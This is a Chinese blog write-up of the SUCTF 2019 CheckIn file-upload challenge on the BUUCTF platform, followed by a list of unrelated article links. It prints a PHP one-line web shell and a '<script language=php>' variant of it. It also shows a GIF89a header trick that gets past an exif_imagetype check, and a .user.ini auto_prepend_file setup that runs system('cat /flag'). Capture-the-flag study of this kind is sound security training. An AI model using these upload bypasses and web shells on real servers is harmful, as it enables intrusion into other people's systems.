buuctf-SUCTF 2019 CheckIn(小宇特详解)

2023-10-07 19:59

本文主要是介绍buuctf-SUCTF 2019 CheckIn(小宇特详解),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

buuctf-SUCTF 2019 CheckIn(小宇特详解)

咋一看这是一道文件上传

这里先尝试一下上传一个php文件

里面写一个最简单的一句话木马就行

<?php eval(@$_POST['shell']);?>

上传试试

回显illegal suffix!(非法后缀)

这里尝试一下修改文件拓展名php5,phtml,等都没有成功

然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀)

这里我上传一张jpg

回显<? in contents!

说明不能有<?

那这里就清晰了,修改一下一句话木马使得一句话木马没有<?

<script language='php'>eval($_POST['shell']);<scirpt>

这里上传包含上面代码的jpg文件

回显exif_imagetype:not image!

这里使用exif_imagetype函数来判断是否是jpg文件,这里使用添加gif文件头GIF89a就能进行绕过

这里成功上传

这里尝试上传一个.htaccess文件将jpg文件变成php文件执行

这里在1.txt文件中写入

AddType application/x-httpd-php .jpg

然后在1.txt的文件中打开cmd,输入ren 1.txt .htaccess,这样来生成.htaccess

然后将.htaccess上传

回显exif_imagetype:not image!

说明不行

这里由于当你上传成功的时候会出现index.php,所以这里使用的是.user.ini

.user.ini简介

.user.ini文件
自PHP5.3.0起,PHP支持基于每个目录的.htaccess风格的IN/文件。此类文件仅被CGl /FastCGl SAPI处理。此功能使得PECL的 htscanner扩展作废。如果使用Apache,则用.htaccess文件有同样效果。
除了主php.ini 之外,PHP还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVERL’DOCUMENT_RO0T’]所指定的)。如果被执行的PHP文件在web根目录之外,则只扫描该目录。
在.user.ini风格的INl文件中只有具有 PHP_INI_PERDIR和PHP_INI_USER模式的INI设置可被识别。
两个新的INI指令,user_ini.filename和user_ini.cache_ttl控制着用户INI文件的使用。
user_inifilename设定了 PHP会在每个目录下搜寻的文件名;如果设定为空字符串则PHP不会搜寻。默认值是.user.ini。user_ini.cache_ttl控制着重新读取用户INl文件的间隔时间。默认是300秒(5分钟)。

这里的意思就是说我们在.user.ini中设置php.ini中PHP_INI_PERDIRPHP_INI_USER 模式的 INI 设置,只要是使用CGI/FastCGI模式的服务器都可以使用.user.ini

这里使用的是auto_prepend_fileauto_append_file

他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)。

auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)

这里先上传一个.user.ini

GIF89a
auto_prepend_file=1.jpg

这里成功上传

然后在上传一个图片马

这里注意上面的是1.jpg,那么下面上传的就是1.jpg

GIF89a
<script language='php'>system('cat /flag');</script>

先上传.user.ini,然后上传1.jpg,然后访问

/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php

抓包找到了flag。

这篇关于buuctf-SUCTF 2019 CheckIn(小宇特详解)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/160106

相关文章

Java中注解与元数据示例详解

《Java中注解与元数据示例详解》Java注解和元数据是编程中重要的概念,用于描述程序元素的属性和用途,:本文主要介绍Java中注解与元数据的相关资料,文中通过代码介绍的非常详细,需要的朋友可以参... 目录一、引言二、元数据的概念2.1 定义2.2 作用三、Java 注解的基础3.1 注解的定义3.2 内

JavaScript中的isTrusted属性及其应用场景详解

《JavaScript中的isTrusted属性及其应用场景详解》在现代Web开发中,JavaScript是构建交互式应用的核心语言,随着前端技术的不断发展,开发者需要处理越来越多的复杂场景,例如事件... 目录引言一、问题背景二、isTrusted 属性的来源与作用1. isTrusted 的定义2. 为

使用Python实现操作mongodb详解

《使用Python实现操作mongodb详解》这篇文章主要为大家详细介绍了使用Python实现操作mongodb的相关知识,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、示例二、常用指令三、遇到的问题一、示例from pymongo import MongoClientf

一文详解Python中数据清洗与处理的常用方法

《一文详解Python中数据清洗与处理的常用方法》在数据处理与分析过程中,缺失值、重复值、异常值等问题是常见的挑战,本文总结了多种数据清洗与处理方法,文中的示例代码简洁易懂,有需要的小伙伴可以参考下... 目录缺失值处理重复值处理异常值处理数据类型转换文本清洗数据分组统计数据分箱数据标准化在数据处理与分析过

详解如何在React中执行条件渲染

《详解如何在React中执行条件渲染》在现代Web开发中,React作为一种流行的JavaScript库,为开发者提供了一种高效构建用户界面的方式,条件渲染是React中的一个关键概念,本文将深入探讨... 目录引言什么是条件渲染?基础示例使用逻辑与运算符(&&)使用条件语句列表中的条件渲染总结引言在现代

详解Vue如何使用xlsx库导出Excel文件

《详解Vue如何使用xlsx库导出Excel文件》第三方库xlsx提供了强大的功能来处理Excel文件,它可以简化导出Excel文件这个过程,本文将为大家详细介绍一下它的具体使用,需要的小伙伴可以了解... 目录1. 安装依赖2. 创建vue组件3. 解释代码在Vue.js项目中导出Excel文件,使用第三

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

Linux之软件包管理器yum详解

《Linux之软件包管理器yum详解》文章介绍了现代类Unix操作系统中软件包管理和包存储库的工作原理,以及如何使用包管理器如yum来安装、更新和卸载软件,文章还介绍了如何配置yum源,更新系统软件包... 目录软件包yumyum语法yum常用命令yum源配置文件介绍更新yum源查看已经安装软件的方法总结软

java图像识别工具类(ImageRecognitionUtils)使用实例详解

《java图像识别工具类(ImageRecognitionUtils)使用实例详解》:本文主要介绍如何在Java中使用OpenCV进行图像识别,包括图像加载、预处理、分类、人脸检测和特征提取等步骤... 目录前言1. 图像识别的背景与作用2. 设计目标3. 项目依赖4. 设计与实现 ImageRecogni

Java访问修饰符public、private、protected及默认访问权限详解

《Java访问修饰符public、private、protected及默认访问权限详解》:本文主要介绍Java访问修饰符public、private、protected及默认访问权限的相关资料,每... 目录前言1. public 访问修饰符特点:示例:适用场景:2. private 访问修饰符特点:示例: